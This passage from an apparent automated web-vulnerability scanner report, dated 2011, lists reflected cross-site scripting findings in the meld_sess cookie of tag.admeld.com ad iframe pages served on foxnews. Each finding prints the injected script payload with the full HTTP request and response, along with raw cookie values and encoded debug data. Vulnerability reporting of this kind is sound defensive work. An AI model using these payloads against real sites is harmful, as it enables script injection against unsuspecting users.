<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e25824"><script>alert(1)</script>9bc617e1123&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
1.154. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de73b"><script>alert(1)</script>f2fe86a46e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ede73b"><script>alert(1)</script>f2fe86a46e; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MzA0OSwgIG5ldHdvcms6ICAgICAgIm1heHBvaW50IiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjM2M2RjZDI2LTZhZTgtNDFiZi1iNzRmLTNhMWRmNGI5OTg3ZCIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGVkZTczYiI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmYyZmU4NmE0NmUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInJvcyIsICBkaXY6ICAgICAgICAgICIzNjNkY2QyNi02YWU4LTQxYmYtYjc0Zi0zYTFkZjRiOTk4N2QiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgInJlYWwtdGltZSBiaWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAyMzMsICBhY2NvdW50X2lkOiAgIDYyODksICBuZXR3b3JrX25hbWU6ICJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS43NiIsICBmZWNwbTogICAgICAgICIxLjc2IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJyb3MiLCAgcnVsZTogICAgICAgICAicm9zIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6NjMwNDksICJidXkiOjE3NiwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODEsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdWJlbW9ndWwgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo1ODk1ODA4LCAiYnV5Ijo4NDcxLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjg5NywgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93ZWxjb21lLmhwLmNvbS9jb3VudHJ5L3VzL2VuL2NzL2hvbWVfYy5odG1sIiwiYW4iOiJIUCBEaXJlY3QiLCJzdGF0dXMiOiIwLjEyIiwiZmlkIjo0ODkyLCAiZmNwbSI6IjEuNzUifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyOTc5LCAiYnV5IjoxOTksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9XSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgImh0dHA6Ly93d3cudHlzb24uY29tL0NvbnN1bWVyL1Byb2R1Y3RzL1Byb21vdGlvbnMvVWx0aW1hdGVDaGlja2VuU2FuZHdpY2guYXNweD9jbXBpZD1TYW5kd2ljaEFueU5pZ2h0R1NOZXR3b3JrIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzQ0In0=
Content-Length: 1670
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:31:25 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ede73b"><script>alert(1)</script>f2fe86a46e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
1.155. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25071"><script>alert(1)</script>90866a0e48e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e25071"><script>alert(1)</script>90866a0e48e; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MzA0OSwgIG5ldHdvcms6ICAgICAgIm1heHBvaW50IiwgIHNpemU6ICAgICAgICAgIjMwMHgyNTAiLCAgZnJlcTogICAgICAgICAiMS05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjdmY2UwOGI3LWIzMzctNGQ4Yi1iOGY0LWE2OTNjMTJhMmI0OSIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUyNTA3MSI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjkwODY2YTBlNDhlIiwgIGNvdW50cnk6ICAgICAgIlVTIiwgIGNpdHk6ICAgICAgICAgIkRhbGxhcyIsICBkbWE6ICAgICAgICAgIDYyMywgIHJlZ2lvbjogICAgICAgIlRYIiwgIGlwOiAgICAgICAgICAgIjE3My4xOTMuMjE0LjI0MyIsICBkZXB0aDogICAgICAgIDEsICB0YXJnZXQ6ICAgICAgICJyb3MiLCAgZGl2OiAgICAgICAgICAiN2ZjZTA4YjctYjMzNy00ZDhiLWI4ZjQtYTY5M2MxMmEyYjQ5IiwgIHVybDogICAgICAgICAgImh0dHA6Ly93d3cuZm94bmV3cy5jb20vcG9saXRpY3MvaW5kZXguaHRtbCIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJyZWFsLXRpbWUgYmlkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMjMzLCAgYWNjb3VudF9pZDogICA2Mjg5LCAgbmV0d29ya19uYW1lOiAiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAgcHVibGlzaGVyX25hbWU6ICJmb3huZXdzIiwgIGVjcG06ICAgICAgICAgIjEuNzYiLCAgZmVjcG06ICAgICAgICAiMS43NiIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAicm9zIiwgIHJ1bGU6ICAgICAgICAgInJvcyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIzLjAxIiwiYWQiOjYzMDQ5LCAiYnV5IjoxNzYsImxwIjoiaHR0cDovL3d3dy50eXNvbi5jb20vQ29uc3VtZXIvUHJvZHVjdHMvUHJvbW90aW9ucy9VbHRpbWF0ZUNoaWNrZW5TYW5kd2ljaC5hc3B4P2NtcGlkPVNhbmR3aWNoQW55TmlnaHRHU05ldHdvcmsiLCJhbiI6IiIsInN0YXR1cyI6IjMuMDEiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTk3MTgxLCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHViZW1vZ3VsIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NTg5NTgwOCwgImJ1eSI6ODQ3MSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI4OTcsICJidXkiOjE4OSwibHAiOiJodHRwOi8vd2VsY29tZS5ocC5jb20vY291bnRyeS91cy9lbi9jcy9ob21lX2MuaHRtbCIsImFuIjoiSFAgRGlyZWN0Iiwic3RhdHVzIjoiMC4xMiIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjk3OSwgImJ1eSI6MTk5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsICBob3N0OiAgICAgICAgICJuai10YWcyIn0=
Content-Length: 1674
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:31:24 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e25071"><script>alert(1)</script>90866a0e48e&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
1.156. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/politics

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f65d4"><script>alert(1)</script>c7aac3109a7 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ef65d4"><script>alert(1)</script>c7aac3109a7; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MzA2MCwgIG5ldHdvcms6ICAgICAgIm1heHBvaW50IiwgIHNpemU6ICAgICAgICAgIjcyOHg5MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiZjlhYjU2ZjctYzU4Ny00ODQwLWIwY2UtMTY4OGM3MTI2YTMyIiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZWY2NWQ0Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+YzdhYWMzMTA5YTciLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzIiwgIGRpdjogICAgICAgICAgImY5YWI1NmY3LWM1ODctNDg0MC1iMGNlLTE2ODhjNzEyNmEzMiIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LmZveG5ld3MuY29tL3BvbGl0aWNzL2luZGV4Lmh0bWwiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAicmVhbC10aW1lIGJpZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDIzMywgIGFjY291bnRfaWQ6ICAgNjI4OSwgIG5ldHdvcmtfbmFtZTogIk1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjc2IiwgIGZlY3BtOiAgICAgICAgIjEuNzYiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgInBvbGl0aWNzIiwgIHJ1bGU6ICAgICAgICAgInBvbGl0aWNzIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6NjMwNjAsICJidXkiOjE3OCwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODIsICJidXkiOjUwNCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI4OTksICJidXkiOjE5NiwibHAiOiJodHRwOi8vd3d3LmZhY2Vib29rLmNvbS9TdXBlcjg/dj1hcHBfNjAwOTI5NDA4NiIsImFuIjoiU3VwZXIgOCIsInN0YXR1cyI6IjAuMTEiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI5ODEsICJidXkiOjIwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiaHR0cDovL3d3dy50eXNvbi5jb20vQ29uc3VtZXIvUHJvZHVjdHMvUHJvbW90aW9ucy9VbHRpbWF0ZUNoaWNrZW5TYW5kd2ljaC5hc3B4P2NtcGlkPVNhbmR3aWNoQW55TmlnaHRHU05ldHdvcmsiLCAgaG9zdDogICAgICAgICAibmotdGFnMTUifQ==
Content-Length: 1673
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:41:22 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ef65d4"><script>alert(1)</script>c7aac3109a7&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
1.157. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/politics

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3fb3"><script>alert(1)</script>4fd93403c0d was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ec3fb3"><script>alert(1)</script>4fd93403c0d; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MzA2MCwgIG5ldHdvcms6ICAgICAgIm1heHBvaW50IiwgIHNpemU6ICAgICAgICAgIjcyOHg5MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiODQyMTJhMDUtMmU0ZC00M2QxLTkxM2YtYWIxMzU3Zjg5YjgyIiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZWMzZmIzIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+NGZkOTM0MDNjMGQiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzIiwgIGRpdjogICAgICAgICAgIjg0MjEyYTA1LTJlNGQtNDNkMS05MTNmLWFiMTM1N2Y4OWI4MiIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LmZveG5ld3MuY29tL3BvbGl0aWNzL2luZGV4Lmh0bWwiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAicmVhbC10aW1lIGJpZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDIzMywgIGFjY291bnRfaWQ6ICAgNjI4OSwgIG5ldHdvcmtfbmFtZTogIk1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjc2IiwgIGZlY3BtOiAgICAgICAgIjEuNzYiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgInBvbGl0aWNzIiwgIHJ1bGU6ICAgICAgICAgInBvbGl0aWNzIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6NjMwNjAsICJidXkiOjE3OCwibHAiOiJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsImFuIjoiIiwic3RhdHVzIjoiMy4wMSIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODIsICJidXkiOjUwNCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI4OTksICJidXkiOjE5NiwibHAiOiJodHRwOi8vd2VsY29tZS5ocC5jb20vY291bnRyeS91cy9lbi9jcy9ob21lX2MuaHRtbCIsImFuIjoiSFAgRGlyZWN0Iiwic3RhdHVzIjoiMC4xNiIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjk4MSwgImJ1eSI6MjAwLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICJodHRwOi8vd3d3LnR5c29uLmNvbS9Db25zdW1lci9Qcm9kdWN0cy9Qcm9tb3Rpb25zL1VsdGltYXRlQ2hpY2tlblNhbmR3aWNoLmFzcHg/Y21waWQ9U2FuZHdpY2hBbnlOaWdodEdTTmV0d29yayIsICBob3N0OiAgICAgICAgICJuai10YWcxNyJ9
Content-Length: 1673
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:41:21 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ec3fb3"><script>alert(1)</script>4fd93403c0d&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
1.158. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/ros

Issue detail

